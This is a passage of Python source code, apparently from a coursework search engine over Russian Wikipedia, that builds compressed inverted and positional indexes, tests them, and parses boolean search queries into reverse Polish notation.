result.write(to_format(DCG(assessment[0:1])) + ' '+ to_format(DCG(assessment[0:3])) + ' '\n + to_format(DCG(assessment)) + '\\n')\n avr_NDCG[0] += NDCG(assessment[0:1])\n avr_NDCG[1] += NDCG(assessment[0:3])\n avr_NDCG[2] += NDCG(assessment)\n result.write(to_format(NDCG(assessment[0:1])) + ' '+ to_format(NDCG(assessment[0:3])) + ' '\n + to_format(NDCG(assessment)) + '\\n')\n avr_ERR[0] += ERR(assessment[0:1])\n avr_ERR[1] += ERR(assessment[0:3])\n avr_ERR[2] += ERR(assessment)\n result.write(to_format(ERR(assessment[0:1])) + ' '+ to_format(ERR(assessment[0:3])) + ' '\n + to_format(ERR(assessment)) + '\\n')\n result.write('AVR\\n')\n for avr in [avr_P, avr_CG, avr_DCG, avr_NDCG, avr_ERR]:\n for number in avr:\n result.write(to_format(number/len(engine_data)) + ' ')\n result.write('\\n')\n\n assessment_file.close()\n result.close()\n\n\ndef hash_used(token):\n return hashlib.sha512(bytes(token, 'utf-8')).hexdigest()\n\n\ndef indexation(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name,\n coordinate_file_name, jump_table_file_name, inverse_title_index_file_name, coordinate_title_file_name,\n test=False, stats=False):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n dictionary_file = open(dictionary_file_name, 'wb')\n inverse_index_file = open(inverse_index_file_name, 'wb')\n straight_index_file = open(straight_index_file_name, 'wb')\n coordinate_file = open(coordinate_file_name, 'wb')\n jump_table_file = open(jump_table_file_name, 'wb')\n inverse_title_index_file = open(inverse_title_index_file_name, 'wb')\n coordinate_title_file = open(coordinate_title_file_name, 'wb')\n\n all_tokens = set()\n dictionary = dict()\n dictionary_title = dict()\n coordinates = dict()\n coordinates_title = dict()\n straight_index_data = []\n id_page = -1\n wiki_link_prefix = 'https://ru.wikipedia.org/?curid='\n title_now = 0\n coordinate = 0\n line = token_file.readline()\n while line:\n if title_now != 0:\n title_now += 1\n if title_now == 3:\n straight_index_data[-1][2] = line\n title_now = 0\n coordinate_title = 0\n tokens = line.split()\n for token in tokens:\n token = token.lower()\n token = remove_rus_ending(token)\n\n all_tokens.add(token)\n if token not in coordinates_title:\n coordinates_title[token] = dict()\n if id_page not in coordinates_title[token].keys():\n coordinates_title[token][id_page] = []\n coordinates_title[token][id_page].append(coordinate_title)\n if token in dictionary_title.keys() and dictionary_title[token][-1] != id_page:\n dictionary_title[token].append(id_page)\n elif token not in dictionary_title.keys():\n dictionary_title[token] = [id_page]\n coordinate_title += 1\n line = token_file.readline()\n continue\n if line.startswith(PAGE_TOKEN_PREFIX):\n line = line.replace(PAGE_TOKEN_PREFIX, '')\n id_page = int(line)\n straight_index_data.append([id_page, wiki_link_prefix+str(id_page), '', token_file.tell()])\n title_now = 1\n coordinate = 0\n else:\n tokens = line.split()\n for token in tokens:\n token = token.lower()\n token = remove_rus_ending(token)\n\n all_tokens.add(token)\n if token not in coordinates:\n coordinates[token] = dict()\n if id_page not in coordinates[token].keys():\n coordinates[token][id_page] = []\n coordinates[token][id_page].append(coordinate)\n if token in dictionary.keys() and dictionary[token][-1] != id_page:\n dictionary[token].append(id_page)\n elif token not in dictionary.keys():\n dictionary[token] = [id_page]\n coordinate += 1\n line = token_file.readline()\n\n dictionary_data = []\n inverse_index_file_offset = 0\n inverse_index_title_file_offset = 0\n jump_table_file_offset = 0\n for key in all_tokens:\n elem = [hash_used(key)]\n if key in dictionary.keys():\n dictionary[key].sort()\n elem.extend([len(dictionary[key]), 0, dictionary[key], coordinates[key], 0])\n else:\n elem.extend([0, 0, [], [], 0])\n if key in dictionary_title.keys():\n dictionary_title[key].sort()\n elem.extend([0, dictionary_title[key], coordinates_title[key]])\n else:\n elem.extend([0, [], []])\n dictionary_data.append(elem)\n\n dictionary_data.sort(key=lambda a: a[0])\n coordinates_offset = 0\n coordinates_title_offset = 0\n for i in range(len(dictionary_data)):\n hash_value, number_ids, offset, page_ids, token_coordinates, jump_table_offset, offset_title, page_ids_title, coordinates_title = dictionary_data[i]\n offsets_coordinate_index_file = []\n offsets_coordinate_title_index_file = []\n\n def sorted_list_to_difference(data):\n if len(data) == 1:\n return []\n\n result = []\n for i in range(1, len(data)):\n result.append(data[i] - data[i - 1])\n return result\n\n if len(page_ids) > 0:\n dictionary_data[i][2] = inverse_index_file_offset\n\n for page_id in page_ids:\n offsets_coordinate_index_file.append(coordinates_offset)\n\n coordinates_difference = sorted_list_to_difference(token_coordinates[page_id])\n\n coordinate_file.write(struct.pack('i', len(token_coordinates[page_id])))\n coordinate_file.write(struct.pack('i', token_coordinates[page_id][0]))\n compressed_coordinates_difference = simple9_encode(coordinates_difference)\n coordinate_file.write(struct.pack('i', len(compressed_coordinates_difference)))\n\n if len(compressed_coordinates_difference) > 0:\n coordinate_file.write(compressed_coordinates_difference)\n\n coordinates_offset += INTEGER_LENGTH * 3 + len(compressed_coordinates_difference)\n\n compressed_page_ids, jump_table_info = simple9_encode(sorted_list_to_difference(page_ids), jump_table_info_need=True)\n compressed_coordinate_offsets = simple9_encode(sorted_list_to_difference(offsets_coordinate_index_file))\n\n inverse_index_file.write(struct.pack('i', page_ids[0]))\n inverse_index_file.write(struct.pack('i', len(compressed_page_ids)))\n inverse_index_file.write(compressed_page_ids)\n\n inverse_index_file.write(struct.pack('i', offsets_coordinate_index_file[0]))\n inverse_index_file.write(struct.pack('i', len(compressed_coordinate_offsets)))\n inverse_index_file.write(compressed_coordinate_offsets)\n\n if len(compressed_page_ids) > CREATE_JUMP_TABLE_MIN_BYTES:\n dictionary_data[i][5] = jump_table_file_offset\n jump_table_info = [[page_ids[x+1], y + inverse_index_file_offset + INTEGER_LENGTH * 2] for x, y in jump_table_info]\n compressed_jump_table_page_ids = simple9_encode(sorted_list_to_difference([x for x, y in jump_table_info]))\n jump_table_file.write(struct.pack('ii', jump_table_info[0][0], len(compressed_jump_table_page_ids)))\n jump_table_file.write(compressed_jump_table_page_ids)\n compressed_jump_table_offsets = simple9_encode(sorted_list_to_difference([y for x, y in jump_table_info]))\n jump_table_file.write(struct.pack('ii', jump_table_info[0][1], len(compressed_jump_table_offsets)))\n jump_table_file.write(compressed_jump_table_offsets)\n jump_table_file_offset += INTEGER_LENGTH * 4 + len(compressed_jump_table_page_ids) + len(compressed_jump_table_offsets)\n else:\n dictionary_data[i][5] = -1\n\n inverse_index_file_offset += INTEGER_LENGTH * 4 + len(compressed_page_ids) + len(compressed_coordinate_offsets)\n else:\n dictionary_data[i][2] = -1\n dictionary_data[i][5] = -1\n\n if len(page_ids_title) > 0:\n dictionary_data[i][6] = inverse_index_title_file_offset\n\n for page_id in page_ids_title:\n offsets_coordinate_title_index_file.append(coordinates_title_offset)\n\n coordinates_difference = sorted_list_to_difference(coordinates_title[page_id])\n\n coordinate_title_file.write(struct.pack('i', len(coordinates_title[page_id])))\n coordinate_title_file.write(struct.pack('i', coordinates_title[page_id][0]))\n compressed_title_coordinates_difference = simple9_encode(coordinates_difference)\n coordinate_title_file.write(struct.pack('i', len(compressed_title_coordinates_difference)))\n\n if len(compressed_title_coordinates_difference) > 0:\n coordinate_title_file.write(compressed_title_coordinates_difference)\n\n coordinates_title_offset += INTEGER_LENGTH * 3 + len(compressed_title_coordinates_difference)\n\n compressed_page_ids_title = simple9_encode(sorted_list_to_difference(page_ids_title))\n compressed_coordinates_title_offsets = simple9_encode(\n sorted_list_to_difference(offsets_coordinate_title_index_file))\n\n inverse_title_index_file.write(struct.pack('i', page_ids_title[0]))\n inverse_title_index_file.write(struct.pack('i', len(compressed_page_ids_title)))\n inverse_title_index_file.write(compressed_page_ids_title)\n\n inverse_title_index_file.write(struct.pack('i', offsets_coordinate_title_index_file[0]))\n inverse_title_index_file.write(struct.pack('i', len(compressed_coordinates_title_offsets)))\n inverse_title_index_file.write(compressed_coordinates_title_offsets)\n\n inverse_index_title_file_offset += INTEGER_LENGTH * 4 + len(compressed_page_ids_title) + len(\n compressed_coordinates_title_offsets)\n else:\n dictionary_data[i][6] = -1\n\n dictionary_binary_data = []\n for hash_value, number_ids, offset, page_ids, token_coordinates, jump_table_offset, offset_title, _, _ in dictionary_data:\n element = struct.pack(str(HASH_LENGTH)+'siiii', bytes(hash_value, 'utf-8'), number_ids, offset, jump_table_offset, offset_title)\n dictionary_binary_data.append(element)\n\n dictionary_file.write(zlib.compress(b''.join(dictionary_binary_data), level=9))\n\n straight_index_data.sort(key=lambda a: a[0])\n straight_index_binary_data = []\n for page_id, link, title, state_offset in straight_index_data:\n link_length = len(bytes(link, 'utf-8'))\n title_length = len(bytes(title, 'utf-8'))\n element = struct.pack('iiii' + str(link_length) + 's' + str(title_length) + 's', page_id, state_offset,\n link_length, title_length, bytes(link, 'utf-8'), bytes(title, 'utf-8'))\n straight_index_binary_data.append(element)\n\n straight_index_file.write(zlib.compress(b''.join(straight_index_binary_data), level=9))\n\n token_file.close()\n dictionary_file.close()\n inverse_index_file.close()\n straight_index_file.close()\n coordinate_file.close()\n jump_table_file.close()\n inverse_title_index_file.close()\n coordinate_title_file.close()\n\n if test:\n test_dictionary = dict()\n test_coordinates = dict()\n test_coordinates_title = dict()\n for hash_value, number_ids, offset, page_ids, token_coordinates, jump_table_offset, offset_title, page_ids_title, coordinates_title in dictionary_data:\n test_dictionary[hash_value] = [number_ids, offset, jump_table_offset, offset_title]\n test_coordinates[hash_value] = token_coordinates\n test_coordinates_title[hash_value] = coordinates_title\n\n test_straight_index = dict()\n for page_id, link, title, offset in straight_index_data:\n test_straight_index[page_id] = [link, title, offset]\n\n return test_dictionary, test_straight_index, dictionary, test_coordinates, test_coordinates_title\n if stats:\n return dictionary\n\n\ndef read_dictionary(dictionary_file_name):\n data = open(dictionary_file_name, 'rb')\n result = dict()\n\n uncompress_data = zlib.decompress(data.read())\n\n length_data = len(uncompress_data)\n i = 0\n element_length = HASH_LENGTH+4*INTEGER_LENGTH\n while i < length_data:\n hash_value, number_ids, offset, jump_table_offset, offset_title = struct.unpack(str(HASH_LENGTH)+'siiii', uncompress_data[i:i+element_length])\n result[hash_value.decode('utf-8')] = [number_ids, offset, jump_table_offset, offset_title]\n i += element_length\n\n data.close()\n return result\n\n\ndef read_page_ids(inverse_index_file_name, offset, number_ids=None):\n if offset == -1:\n return []\n\n data = open(inverse_index_file_name, 'rb')\n data.seek(offset)\n\n first_page_id, compressed_page_ids_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n if compressed_page_ids_length < 0:\n print(first_page_id, compressed_page_ids_length, offset)\n page_ids_difference = simple9_decode(data.read(compressed_page_ids_length))\n first_coordinate_offset, compressed_coordinate_offset_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n coordinate_offset_difference = simple9_decode(data.read(compressed_coordinate_offset_length))\n result = [[first_page_id, first_coordinate_offset]]\n\n for page_id_diff, coordinate_offset_diff in list(zip(page_ids_difference, coordinate_offset_difference)):\n result.append([result[-1][0]+page_id_diff, result[-1][1]+coordinate_offset_diff])\n\n data.close()\n\n return result\n\n\ndef read_coordinates(coordinate_file_name, offset):\n data = open(coordinate_file_name, 'rb')\n data.seek(offset)\n\n _, result, compression_data_length = struct.unpack('iii', data.read(3*INTEGER_LENGTH))\n result = [result]\n\n if compression_data_length > 0:\n coordinates_difference = simple9_decode(data.read(compression_data_length))\n for difference in coordinates_difference:\n result.append(result[-1] + difference)\n\n data.close()\n\n return result\n\n\ndef read_number_coordinates(coordinate_file_name, offset):\n data = open(coordinate_file_name, 'rb')\n data.seek(offset)\n\n result = struct.unpack('i', data.read(INTEGER_LENGTH))[0]\n\n data.close()\n\n return result\n\n\ndef read_first_coordinate(coordinate_file_name, offset):\n data = open(coordinate_file_name, 'rb')\n data.seek(offset)\n\n result = struct.unpack('ii', data.read(2*INTEGER_LENGTH))[1]\n\n data.close()\n\n return result\n\n\ndef read_straight_index(straight_index_file):\n data = open(straight_index_file, 'rb')\n straight_index = dict()\n\n uncompress_data = zlib.decompress(data.read())\n\n length_data = len(uncompress_data)\n i = 0\n while i < length_data:\n page_id, state_offset, link_length, title_length = struct.unpack('iiii', uncompress_data[i:i+4*INTEGER_LENGTH])\n i += 4*INTEGER_LENGTH\n link, title = struct.unpack(str(link_length) + 's' + str(title_length) + 's',\n uncompress_data[i:i+link_length+title_length])\n straight_index[page_id] = [link.decode('utf-8'), title.decode('utf-8'), state_offset]\n i += link_length+title_length\n data.close()\n return straight_index\n\n\ndef stats_term(token_file_name, index_file_name):\n dictionary = indexation(token_file_name, index_file_name, stats=True)\n print('Number of terms:', len(dictionary.keys()))\n\n avr = 0\n for term in dictionary.keys():\n avr += len(term)\n avr /= len(dictionary.keys())\n\n print('Average length of term:', avr)\n\n\ndef test_indexation():\n number_test = ['16_clear', '8_clear', '4_clear', '2_clear', '1_clear']\n test_prefix = '../test_tokens/data_1_'\n dictionary_file_name = '../test_tokens/dictionary.bin'\n inverse_index_file_name = '../test_tokens/inverse_index.bin'\n straight_index_file_name = '../test_tokens/straight_index.bin'\n coordinate_index_file_name = '../test_tokens/coordinate_index.bin'\n\n for i in range(len(number_test)):\n start_time = time.time()\n indexation(test_prefix + number_test[i] + '.txt', dictionary_file_name,\n inverse_index_file_name, straight_index_file_name, coordinate_index_file_name)\n print(test_prefix + number_test[i] + '.txt:', time.time() - start_time)\n\n\nclass TestIndexation(unittest.TestCase):\n\n def test01_serialization(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n dictionary, straight_index, dictionary_pages, \\\n coordinates, coordinates_title = indexation(token_file_name, dictionary_file_name,\n inverse_index_file_name, straight_index_file_name,\n coordinate_file_name, jump_table_file_name,\n inverse_index_title_file_name,\n coordinate_index_title_file_name, test=True)\n dictionary_read = read_dictionary(dictionary_file_name)\n straight_index_read = read_straight_index(straight_index_file_name)\n self.assertDictEqual(dictionary, dictionary_read)\n self.assertDictEqual(straight_index, straight_index_read)\n for term in dictionary_pages:\n number_ids, offset, _, offset_title = dictionary_read[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset)\n page_ids_title = read_page_ids(inverse_index_title_file_name, offset_title)\n self.assertListEqual([x[0] for x in page_ids], dictionary_pages[term])\n for page_id, offset in page_ids:\n coord = read_coordinates(coordinate_file_name, offset)\n self.assertListEqual(coord, coordinates[hash_used(term)][page_id])\n for page_id, offset in page_ids_title:\n coord = read_coordinates(coordinate_index_title_file_name, offset)\n self.assertListEqual(coord, coordinates_title[hash_used(term)][page_id])\n\n def test02_empirical_index_current(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n dictionary = read_dictionary(dictionary_file_name)\n\n page_to_terms = dict()\n page_to_terms[84966] = ['quake', 'scourge', 'of', 'armagon', 'первый',\n 'набор', 'дополнительных', 'миссий', 'к', 'игре']\n page_to_terms[88956] = ['dungeon', 'keeper', '2', 'хранитель', 'подземелья', 'или', 'сокращённо', 'dk2',\n 'продолжение', 'игры', 'выпущенной', 'компанией', 'bullfrog', 'productions', 'и',\n 'изданная', 'компанией', 'electronic', 'arts']\n page_to_terms[84591] = ['wolfenstein', '3d', 'компьютерная', 'игра', 'в', 'жанре', 'шутера', 'от', 'первого',\n 'лица', 'разработанная', 'компанией', 'id', 'software', 'и', 'изданная', 'apogee',\n 'software']\n\n for page_id in page_to_terms.keys():\n for term in page_to_terms[page_id]:\n term = term.lower()\n term = remove_rus_ending(term)\n number_ids, offset, _, offset_title = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset)\n page_ids_title = read_page_ids(coordinate_index_title_file_name, offset_title)\n self.assertTrue(page_id in [x[0] for x in page_ids] or page_id in [x[0] for x in page_ids_title])\n\n def test03_jump_tables_current(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n dictionary = read_dictionary(dictionary_file_name)\n\n for key in dictionary.keys():\n number_ids, offset, jump_table_offset, _ = dictionary[key]\n if jump_table_offset > -1:\n jump_table = read_jump_table(jump_table_file_name, jump_table_offset)\n page_ids_by_blocks = read_block_page_ids(jump_table, -1, inverse_index_file_name, offset)\n\n for block_id in range(len(jump_table)):\n page_ids_by_blocks.extend(read_block_page_ids(jump_table, block_id, inverse_index_file_name, offset))\n\n self.assertListEqual(page_ids_by_blocks, [x for x, y in read_page_ids(inverse_index_file_name, offset)])\n\n def test04_title_index_current(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n dictionary = read_dictionary(dictionary_file_name)\n straight_index = read_straight_index(straight_index_file_name)\n\n for page_id in straight_index.keys():\n for term in straight_index[page_id][1].split():\n term = term.lower()\n term = remove_rus_ending(term)\n _, _, _, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_title_file_name, offset)\n self.assertTrue(page_id in [x[0] for x in page_ids])\n\n\n\ndef stats_frequency_term_and_zipf(token_file_name, output_file_name):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n output_file = open(output_file_name, 'w', encoding='utf-8')\n freq = dict()\n\n number_terms = 0\n for line in token_file:\n for token in line.split():\n number_terms += 1\n term = token.lower()\n\n if term not in freq:\n freq[term] = 1\n else:\n freq[term] += 1\n\n graph_data = []\n for term in freq.keys():\n freq[term] /= number_terms\n graph_data.append(freq[term])\n\n graph_data.sort(reverse=True)\n\n index = 1\n while index < len(graph_data):\n output_file.write(str(index) + ' ' + str(graph_data[index-1]) + ' ' + str(graph_data[0]/index) + '\\n')\n index += 1\n\n token_file.close()\n output_file.close()\n\n\ndef create_all_page_ids(token_file_name, all_page_ids_file_name):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n all_page_ids_file = open(all_page_ids_file_name, 'wb')\n all_page_ids = []\n\n number_terms = 0\n for line in token_file:\n if line.startswith(PAGE_TOKEN_PREFIX):\n line = line.replace(PAGE_TOKEN_PREFIX, '')\n id_page = int(line)\n\n if len(all_page_ids) > 0:\n all_page_ids[-1] = [all_page_ids[-1], number_terms]\n\n number_terms = 0\n all_page_ids.append(id_page)\n else:\n number_terms += len(line.split())\n\n all_page_ids[-1] = [all_page_ids[-1], number_terms]\n #print(all_page_ids)\n all_page_ids.sort(key=lambda a: a[0])\n for page_id, terms_counter in all_page_ids:\n all_page_ids_file.write(struct.pack('ii', page_id, terms_counter))\n #print(all_page_ids)\n token_file.close()\n all_page_ids_file.close()\n\n\ndef read_all_page_ids(all_page_ids_file_name):\n all_page_ids_file = open(all_page_ids_file_name, 'rb')\n\n page_ids = []\n for buffer in iter(lambda: all_page_ids_file.read(2*INTEGER_LENGTH), b''):\n if buffer == b'':\n break\n page_ids.append(struct.unpack('ii', buffer)[0])\n\n all_page_ids_file.close()\n\n return page_ids\n\n\ndef read_all_page_ids_with_stat(all_page_ids_file_name):\n all_page_ids_file = open(all_page_ids_file_name, 'rb')\n\n page_ids_with_stat = dict()\n for buffer in iter(lambda: all_page_ids_file.read(2*INTEGER_LENGTH), b''):\n if buffer == b'':\n break\n page_id, terms_number = list(struct.unpack('ii', buffer))\n page_ids_with_stat[page_id] = terms_number\n\n all_page_ids_file.close()\n\n return page_ids_with_stat\n\n\ndef union_ids(a, b, inverse_index_file_name):\n result = []\n\n if not a[0] and not b[0]:\n a = a[1]\n b = b[1]\n elif a[0] and b[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n elif a[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = b[1]\n else:\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n a = a[1]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n result.append(a[i])\n i += 1\n elif b[j] < a[i]:\n result.append(b[j])\n j += 1\n else:\n result.append(a[i])\n i += 1\n j += 1\n\n if i < n:\n result.extend(a[i:])\n if j < m:\n result.extend(b[j:])\n\n return result\n\n\ndef intersection_ids(a, b, inverse_index_file_name):\n result = []\n\n if not a[0] and not b[0]:\n a = a[1]\n b = b[1]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n i += 1\n elif b[j] < a[i]:\n j += 1\n else:\n result.append(a[i])\n i += 1\n j += 1\n elif a[0] and b[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2])]\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2])]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n i += 1\n elif b[j] < a[i]:\n j += 1\n else:\n result.append(a[i])\n i += 1\n j += 1\n else:\n if b[0]:\n a, b = b, a\n inverse_offset = a[2]\n a = a[1]\n b = b[1]\n n, m = len(a), len(b)\n i, j = 0, 0\n while i < n and j < m:\n if a[i][0] < b[j]:\n i += 1\n elif b[j] < a[i][0]:\n block_page_ids = read_block_page_ids(a, i - 1, inverse_index_file_name, inverse_offset)\n k = 0\n while k < len(block_page_ids) and j < m:\n if block_page_ids[k] < b[j]:\n k += 1\n elif b[j] < block_page_ids[k]:\n j += 1\n else:\n result.append(block_page_ids[k])\n k += 1\n j += 1\n i += 1\n else:\n result.append(a[i][0])\n i += 1\n j += 1\n\n last_block_page_ids = read_block_page_ids(a, len(a)-1, inverse_index_file_name, inverse_offset)\n k = 0\n while k < len(last_block_page_ids) and j < m:\n if last_block_page_ids[k] < b[j]:\n k += 1\n elif b[j] < last_block_page_ids[k]:\n j += 1\n else:\n result.append(last_block_page_ids[k])\n k += 1\n j += 1\n\n return result\n\n\ndef difference_ids(a, b, inverse_index_file_name):\n result = []\n\n if not a[0] and not b[0]:\n a = a[1]\n b = b[1]\n elif a[0] and b[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n elif a[0]:\n a = [x for x, y in read_page_ids(inverse_index_file_name, a[2], None)]\n b = b[1]\n else:\n b = [x for x, y in read_page_ids(inverse_index_file_name, b[2], None)]\n a = a[1]\n\n n, m = len(a), len(b)\n i, j = 0, 0\n\n while i < n and j < m:\n if a[i] < b[j]:\n result.append(a[i])\n i += 1\n elif b[j] < a[i]:\n j += 1\n else:\n i += 1\n j += 1\n\n if i < n:\n result.extend(a[i:])\n\n return result\n\n\nclass TokenType:\n UNKNOWN = -1\n LEXEME = 0\n QUOTE = 1\n OPERATOR_BIN = 2\n OPERATOR_UNO = 3\n OPEN_BRACKET_ROUNDED = 4\n OPEN_BRACKET_FIGURE = 5\n OPEN_BRACKET_SQUARE = 6\n CLOSE_BRACKET_ROUNDED = 7\n CLOSE_BRACKET_FIGURE = 8\n CLOSE_BRACKET_SQUARE = 9\n\n\ndef get_RPN_by_request(user_request):\n user_request = user_request.lower()\n request = ''\n for i in range(len(user_request)):\n if not (user_request[i].isdigit() or user_request[i].isalpha() or\n user_request[i] in [')', ']', '}', '(', '[', '{', '&', '|', '!', '\"', '/']):\n request += ' '\n else:\n request += user_request[i]\n position = [0]\n last_token_type = [-1]\n\n def get_next_token():\n while True:\n #print(request)\n #print(' '*position[0]+'^')\n if position[0] >= len(request):\n return None, None\n\n if (request[position[0]].isalpha() or request[position[0]].isdigit()) and last_token_type[0] == TokenType.QUOTE:\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '&&'\n if request[position[0]].isalpha() or request[position[0]].isdigit():\n token = ''\n while position[0] < len(request) and (request[position[0]].isalpha() or request[position[0]].isdigit()):\n token += request[position[0]].lower()\n position[0] += 1\n last_token_type[0] = TokenType.LEXEME\n return TokenType.LEXEME, token\n if request[position[0]].isspace() and (last_token_type[0] == TokenType.LEXEME\n or last_token_type[0] == TokenType.QUOTE\n or last_token_type[0] >= TokenType.CLOSE_BRACKET_ROUNDED):\n while position[0] < len(request) and request[position[0]].isspace():\n position[0] += 1\n if position[0] < len(request) and (request[position[0]].isalpha() or request[position[0]].isdigit() or\n request[position[0]] in ['(', '[', '{', '!', '\"']):\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '&&'\n if position[0] >= len(request):\n return None, None\n if request[position[0]].isspace():\n while position[0] < len(request) and request[position[0]].isspace():\n position[0] += 1\n if position[0] >= len(request):\n return None, None\n if position[0]+1 < len(request) and request[position[0]] == '&' and request[position[0]+1] == '&':\n position[0] += 2\n\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '&&'\n elif request[position[0]] == '&':\n return TokenType.UNKNOWN, None\n if position[0] + 1 < len(request) and request[position[0]] == '|' and request[position[0] + 1] == '|':\n position[0] += 2\n last_token_type[0] = TokenType.OPERATOR_BIN\n return TokenType.OPERATOR_BIN, '||'\n elif request[position[0]] == '|':\n return TokenType.UNKNOWN, None\n if request[position[0]] == '!':\n position[0] += 1\n last_token_type[0] = TokenType.OPERATOR_UNO\n return TokenType.OPERATOR_UNO, '!'\n if request[position[0]] == '(':\n position[0] += 1\n last_token_type[0] = TokenType.OPEN_BRACKET_ROUNDED\n return TokenType.OPEN_BRACKET_ROUNDED, '('\n if request[position[0]] == '[':\n position[0] += 1\n last_token_type[0] = TokenType.OPEN_BRACKET_SQUARE\n return TokenType.OPEN_BRACKET_SQUARE, '['\n if request[position[0]] == '{':\n position[0] += 1\n last_token_type[0] = TokenType.OPEN_BRACKET_FIGURE\n return TokenType.OPEN_BRACKET_FIGURE, '{'\n if request[position[0]] == ')':\n position[0] += 1\n last_token_type[0] = TokenType.CLOSE_BRACKET_ROUNDED\n return TokenType.CLOSE_BRACKET_ROUNDED, ')'\n if request[position[0]] == '}':\n position[0] += 1\n last_token_type[0] = TokenType.CLOSE_BRACKET_FIGURE\n return TokenType.CLOSE_BRACKET_FIGURE, '}'\n if request[position[0]] == ']':\n position[0] += 1\n last_token_type[0] = TokenType.CLOSE_BRACKET_SQUARE\n return TokenType.CLOSE_BRACKET_SQUARE, ']'\n if request[position[0]] == '\"':\n start = position[0] + 1\n position[0] += 1\n while position[0] < len(request) and request[position[0]] != '\"':\n if not (request[position[0]].isalpha() or request[position[0]].isdigit()\n or request[position[0]].isspace()):\n return TokenType.UNKNOWN, None\n position[0] += 1\n if position[0] >= len(request):\n return TokenType.UNKNOWN, None\n lexemes = request[start:position[0]].split()\n\n if len(lexemes) == 0:\n return TokenType.UNKNOWN, None\n\n distance = len(lexemes) - 1\n position[0] += 1\n space = False\n free_space_after = False\n while position[0] < len(request) and request[position[0]].isspace():\n space = True\n position[0] += 1\n if position[0] < len(request) and request[position[0]] == '/':\n position[0] += 1\n while position[0] < len(request) and request[position[0]].isspace():\n position[0] += 1\n free_space_after = True\n if position[0] >= len(request) or not request[position[0]].isdigit():\n return TokenType.UNKNOWN, None\n start_digit = position[0]\n while position[0] < len(request) and request[position[0]].isdigit():\n position[0] += 1\n if position[0] >= len(request):\n distance = int(request[start_digit:])\n elif request[position[0]].isspace() or request[position[0]] in ['&', '|', '(', '[',\n '{', ')', ']', '}']:\n distance = int(request[start_digit:position[0]])\n else:\n return TokenType.UNKNOWN, None\n if distance < len(lexemes) - 1:\n return TokenType.UNKNOWN, None\n elif position[0] < len(request) and not space and request[position[0]] not in ['|', '&']:\n return TokenType.UNKNOWN, None\n elif space or free_space_after:\n position[0] -= 1\n\n last_token_type[0] = TokenType.QUOTE\n return TokenType.QUOTE, [lexemes, distance]\n\n\n result = []\n stack = []\n previous_token_type = -1\n while position[0] < len(request):\n previous_token_type = last_token_type[0]\n token_type, token_value = get_next_token()\n #print(token_value)\n\n if token_type is None:\n break\n if token_type == TokenType.UNKNOWN:\n return None\n if token_type == TokenType.OPERATOR_BIN and previous_token_type == TokenType.OPERATOR_BIN:\n return None\n if token_type == TokenType.OPERATOR_BIN and previous_token_type == -1:\n return None\n if token_type == TokenType.LEXEME or token_type == TokenType.QUOTE:\n result.append([token_type, token_value])\n elif token_type == TokenType.OPERATOR_UNO:\n stack.append([token_type, token_value])\n elif token_type >= TokenType.OPEN_BRACKET_ROUNDED and token_type <= TokenType.OPEN_BRACKET_SQUARE:\n stack.append([token_type, token_value])\n elif token_type >= TokenType.CLOSE_BRACKET_ROUNDED and token_type <= TokenType.CLOSE_BRACKET_SQUARE:\n while len(stack) > 0 and stack[-1][0] != token_type - 3:\n top_type, top_value = stack.pop()\n if top_type >= TokenType.OPEN_BRACKET_ROUNDED and top_type <= TokenType.OPEN_BRACKET_SQUARE:\n return None\n result.append([top_type, top_value])\n if len(stack) == 0:\n return None\n stack.pop()\n elif token_type == TokenType.OPERATOR_BIN:\n while len(stack) > 0 and 